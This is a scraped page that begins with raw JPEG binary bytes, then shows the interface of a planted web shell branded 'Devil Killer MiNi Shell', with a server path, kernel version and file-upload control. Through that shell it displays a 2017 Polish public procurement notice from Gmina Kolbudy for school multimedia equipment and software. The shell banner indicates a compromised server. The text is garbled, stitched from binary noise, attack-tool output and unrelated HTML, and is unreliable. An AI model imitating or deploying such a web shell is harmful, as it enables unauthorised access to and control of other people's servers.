JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170308/39256-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.kolbudy.pl/gospodarka/zamowienia-publiczne.' target='_blank'>http://www.kolbudy.pl/gospodarka/zamowienia-publiczne.</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 39256 - 2017
              z dnia 2017-03-08 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kolbudy: dostawa urządzeń multimedialnych, sprzętu komputerowego wyposażenia i oprogramowania TIK oraz dostęp do platform e-learningowych, dla 5 szkół z terenu Gminy Kolbudy<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Cztery razy K-Kompetencje Kluczowe Kluczem do Kariery uczniów ze szkół z terenu Gminy Kolbudy, współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3 Edukacja</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>Biuro Obsługi Zamówień Publicznych
Plac Kaszubski 8. lok. 311, 81-350 Gdynia
<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Kolbudy, krajowy numer identyfikacyjny
              19167498300000, ul.
              ul. Staromłyńska 
              1,
              83050  
              Kolbudy, woj.
              pomorskie, państwo
              Polska, tel.
              586 910 521, e-mail
              wojciech.jaracz@kolbudy.pl, faks
              586 910 517.
              <br />
              Adres strony internetowej (URL): http://www.kolbudy.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.kolbudy.pl/gospodarka/zamowienia-publiczne</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.kolbudy.pl/gospodarka/zamowienia-publiczne.</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />w siedzibie zamawiającego - Gmina Kolbudy, ul. Staromłyńska 1, 83-050 Kolbudy</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>dostawa urządzeń multimedialnych, sprzętu komputerowego wyposażenia i oprogramowania TIK oraz dostęp do platform e-learningowych, dla 5 szkół z terenu Gminy Kolbudy<br /><b>Numer referencyjny: </b>ZP.271.7.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest dostawa urządzeń multimedialnych, sprzętu komputerowego, wyposażenia i oprogramowania Technologii Informacyjno-Komunikacyjnych (TIK), oraz dostęp do platform e-learningowych, dla 5 szkół z terenu Gminy Kolbudy, w ramach projektu: Cztery razy K-Kompetencje Kluczowe Kluczem do Kariery uczniów ze szkół z terenu Gminy Kolbudy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2014-2020, Poddziałanie 3.2.1 Jakość edukacji ogólnej, Działanie 3.2 Edukacja ogólna, Oś Priorytetowa 3 Edukacja.
2. Przedmiot zamówienia dzieli się na części i obejmuje: 
a) część 1  urządzenia multimedialne, wyposażenie i sprzęt komputerowy TIK
1)	mikroskop z kamerą i akumulatorem - 3 szt. 
2)	mikroskop z podłączeniem do komputera - 1 szt. 
3)	mikroskop optyczny - 2 szt. 
4)	teleskop - 2 szt. 
5)	urządzenie wielofunkcyjne wersja 1  3 szt. 
6)	urządzenie wielofunkcyjne wersja 2  1 szt. 
7)	tablety  84 szt. 
8)	laptopy z oprogramowaniem  5 szt. 
9)	rzutnik do ekranu z montażem  4 szt. 
10)	ekran projekcyjny z montażem  4 szt. 
11)	ekran projekcyjny ramowy  1 szt. 
12)	ekran wysuwany  1 szt. 
13)	tablica multimedialna z głośnikami oraz montażem  5 szt. 
14)	rzutnik do tablicy z uchwytem ściennym i montażem  4 szt. 
15)	 podłoga interaktywna do ćwiczeń, gier i zabaw ruchowych wraz z zestawem treści multimedialnych przeznaczonych do pracy z dziećmi w wieku szkolnym i przedszkolnym,  z montażem  1 szt. 
16)	aparat fotograficzny  4 szt. 
17)	aparat cyfrowy  14 szt. 
18)	monitor informacyjny z oprogramowaniem  3 szt. 
19)	laptop z pakietem biurowym  3 szt. 
20)	stacja dokująca- 2 szt. 
21)	monitor  2 szt. 
22)	urządzenie wielofunkcyjne	1 szt.
23)	mobilna pracownia językowa ze słuchawkami  1 kpl
b)	część 2  pakiety oprogramowania:
1)	oprogramowanie dla uczniów słabowidzących  1 szt.
2)	oprogramowanie graficzne  - licencja dla 16 osób - komplet pakietów  1 kpl.  
3)	zestawy oprogramowania multimedialnego do prowadzenia zajęć matematyczno-przyrodniczych i interdyscyplinarnych w gimnazjum:
a)	matematyka dla klasy 1 2 3 -  5 kpl
b)	fizyka dla klasy 1 2 3   3 kpl
c)	j. polski dla klasy 1 2 3  5 kpl
d)	geografia dla klasy 1 2 3  3 kpl
e)	chemia dla klasy 1 2 3  2 kpl
f)	biologia dla klasy 1 2 3 - 2 kpl
g)	historia dla klasy 1 2 3- 2 kpl
4) oprogramowanie multimedialne do prowadzenia zajęć matematyczno-przyrodniczych w szkole podstawowej:
a) angielski dla dzieci 5-8 lat - 2 kpl
b) angielski dla nastolatków   1 kpl
c) matematyka szkoła podstawowa -multimedialne materiały na tablice interaktywną i projektor -1 kpl
d) przyroda - szkoła podstawowa - multimedialne materiały na tablice interaktywną i projektor - 1 kpl
e) nauka programowania dla najmłodszych - gra edukacyjna ucząca programowania- 1 kpl
f) matematyka szkoła podstawowa -  zestaw 5 płyt CD - 1 kpl
g) alfabet angielski - program na tablicę interaktywną - 1 szt
h) Szkielet człowieka  program na tablice interaktywną - 1 szt.
i) edukacyjne gry o tematyce matematycznej - 1 kpl
j) program multimedialny stanowiący narzędzie do realizacji zajęć metodą projektów - 1 zestaw
k) aplikacja do nauki obsługi komputera w formie zabawy  zajęcia komputerowe  kl.3 SP  1 zestaw (90 dostępów)
l) aplikacja do nauki obsługi komputera w formie zabawy - zajęcia komputerowe kl.2 SP  1 zestaw (40 dostępów)
m) multimedialny program przybliżający tematykę podziału Polski na województwa- licencja na 20 stanowisk - 1 szt
n) edukacyjny program komputerowy dla dzieci od 7 do 12 lat, obrazujący eksperymenty z dziedziny fizyki i chemii - 1 szt.
o) wielostanowiskowy program komputerowy - pakiet do prowadzenia zajęć ukierunkowanych na rozwój pamięci oraz koncentracji uwagi dla dzieci od 5 lat do 9 lat - (15 stanowisk) - 2 kpl
p) multimedialny program do matematyki w szkole podstawowej - 1 kpl
r) multimedialny program do przyrody w szkole podstawowej - 1 kpl
s) interaktywna gra edukacyjna o tematyce przyrodniczej w dwóch częściach 1 kpl- 2 części
t) logiczna gra komputerowa - 1 szt
u) gra edukacyjna o tematyce matematycznej - 10 szt
w) interaktywny mówiący globus z aplikacją na tablet - 3 szt.
z) edukacyjne gry matematyczne - zestaw matematycznych gier edukacyjnych składających się z czterech części - 1 kpl
5) oprogramowanie zajęć wyrównujących szanse edukacyjne:
a) program do terapii pedagogicznej z matematyki  1 zestaw
b) program dla uczniów klas początkowych (6-9 lat), w wersji polskiej i angielskiej, 4 części, do wspomagania kompetencji poznawczych dzieci, pamięci i uwagi  1 zestaw,
6) oprogramowanie do prowadzenia zajęć dla uczniów ze specjalnymi potrzebami edukacyjnymi:
a) zestaw gier multimedialnych  1 komplet
7) pakiet edukacyjny dla najmłodszych dzieci korzystający z narzędzi myślowych TOC komplet  4 zestawy i 77 pakietów dla dzieci
8) oprogramowanie do tworzenia stron  internetowych  2 szt.
c)	część 3 - dostęp do platformy e-learningowej
d)	część 4 - dostęp do językowych platform e-learningowych
<br /><br /><b>II.5) Główny kod CPV: </b>30200000-1<br /><b> Dodatkowe kody CPV:</b>38653400-1,
                38651000-3,
                32322000-6,
                38000000-5,
                48190000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 40<br /></div><div style="padding-left: 20px">
                    Okres w dniach: 10<br /></div><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><div style="padding-left: 20px">
                    Okres w dniach: 7<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie, aktualnych na dzień złożenia, oświadczeń lub dokumentów potwierdzających, że oferowane dostawy spełniają wymagania określone przez zamawiającego w opisie przedmiotu zamówienia, to jest:
dla części 1  wyposażenie i sprzęt komputerowy TIK:
1) karty katalogowe, lub specyfikacje techniczne zawierające parametry ofertowanego sprzętu (dla wszystkich urządzeń poz. 1-23),
2) dla urządzenia wielofunkcyjnego wersja 1 i wersja 2 z poz. 5 i poz. 6:
a)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub równoważną, 
3) dla tabletów konwertowanych  poz. 7
a)	karta katalogowa lub specyfikacja techniczna wskazująca m.in. czas pracy baterii, wyraźne zdjęcia obudowy oferowanego modelu.
b)	 oświadczenie producenta sprzętu (lub jego przedstawiciela w Polsce) potwierdzające, że serwis będzie realizowany przez Producenta lub Autoryzowanego Partnera Serwisowego producenta 
c)	oświadczenie producenta sprzętu (lub jego przedstawiciela w Polsce), że Autoryzowany Partner Serwisowy posiada status autoryzowanego partnera serwisowego producenta komputera,
d)	dokument potwierdzający, że serwis urządzeń będzie realizowany zgodnie z wymogami normy PN-EN ISO 9001,
e)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001,
f)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub równoważną, 
g)	certyfikat producenta systemu operacyjnego, potwierdzający poprawną współpracę oferowanego modelu z systemem operacyjnym Windows 10 lub wydruk ze strony Microsoft WHCL,
h)	certyfikat lub wydruk ze strony Energy Star potwierdzający zgodność oferowanego modelu z normą Energy Star 5.0
i)	deklaracja zgodności CE
4) dla laptopów z oprogramowaniem, poz. 8
a)	karta katalogowa lub specyfikacja techniczna wskazująca m.in. czas pracy baterii, wyraźne zdjęcia obudowy oferowanego modelu.
b)	oświadczenie producenta sprzętu (lub jego przedstawiciela w Polsce), że Autoryzowany Partner Serwisowy posiada status autoryzowanego partnera serwisowego producenta komputera 
c)	dokument potwierdzający, że serwis urządzeń będzie realizowany zgodnie z wymogami normy PN- EN ISO: 9001
d)	oświadczenie producenta oferowanego komputera (lub jego przedstawiciela w Polsce), że oferowane oprogramowanie dodatkowe jest w pełni kompatybilne z oferowanym sprzętem.
e)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001
f)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub równoważną, 
g)	certyfikat producenta systemu operacyjnego, lub wydruk ze strony Microsoft WHCL, potwierdzający poprawną współpracę oferowanego modelu notebooka z systemem operacyjnym Windows 10 oraz Windows 7,
h)	certyfikat lub wydruk ze strony Energy Star potwierdzający zgodność oferowanego modelu z normą Energy Star 5.0
i)	- Deklaracja zgodności CE
5) dla tablicy multimedialnej z głośnikami poz. 13.
-dokument potwierdzający, że serwis urządzenia będzie realizowany zgodnie z wymogami normy ISO 9001:2000 lub ISO 9001:2008 w zakresie urządzeń audiowizualnych oraz posiada autoryzację producenta tablicy
6)	dla rzutnika do tablicy z uchwytem ściennym poz. 14. 
-dokument potwierdzający, że serwis urządzenia będzie realizowany zgodnie z wymogami normy serii PN EN ISO 9001 w zakresie urządzeń audiowizualnych oraz posiada autoryzację producenta rzutnika
7) dla laptopów z poz. 19
a)	karta katalogowa lub specyfikacja techniczna urządzenia,  zawierająca wyraźne zdjęcia obudowy oferowanego komputera
b)	oświadczenie podmiotu realizującego serwis lub producenta sprzętu, że w przypadku awarii dysków twardych dysk pozostaje u Zamawiającego
c)	oświadczenie Wykonawcy potwierdzające, że serwis będzie realizowany przez Producenta lub autoryzowanego Partnera Serwisowego producenta 
d)	dokument potwierdzający, że serwis urządzeń będzie realizowany zgodnie z wymogami normy serii normy serii PN EN ISO 9001
e)	oświadczenie producenta oferowanego komputera (lub jego przedstawiciela w Polsce), że oferowane oprogramowanie dodatkowe jest w pełni kompatybilne z oferowanym sprzętem.
f)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001
g)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub równoważną, 
h)	certyfikat producenta systemu operacyjnego Microsoft, lub wydruk ze strony Microsoft WHCL,.potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Windows 8 64 bit.
i)	Deklaracja zgodności CE
j)	potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki (wg wytycznych Krajowej Agencji Poszanowania Energii S.A., zawartych w dokumencie Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych, pkt. 3.4.2.1; dokument z grudnia 2006), w szczególności zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram.
k)	wydruk ze strony internetowej http://www.eu-energystar.org lub http://www.energystar.gov , zaświadczenie lub certyfikat potwierdzający, że komputer spełnia wymogi normy Energy Star 5.0. 
8) dla monitora z poz. 21
a)	oświadczenie Wykonawcy potwierdzające, że serwis będzie realizowany przez Producenta lub autoryzowanego Partnera Serwisowego producenta
b)	certyfikat TCO min. 7.0 
c)	certyfikat lub wydruk ze strony Energy Star potwierdzający zgodność oferowanego modelu z normą Energy Star 5.0
d)	Deklaracja zgodności CE 
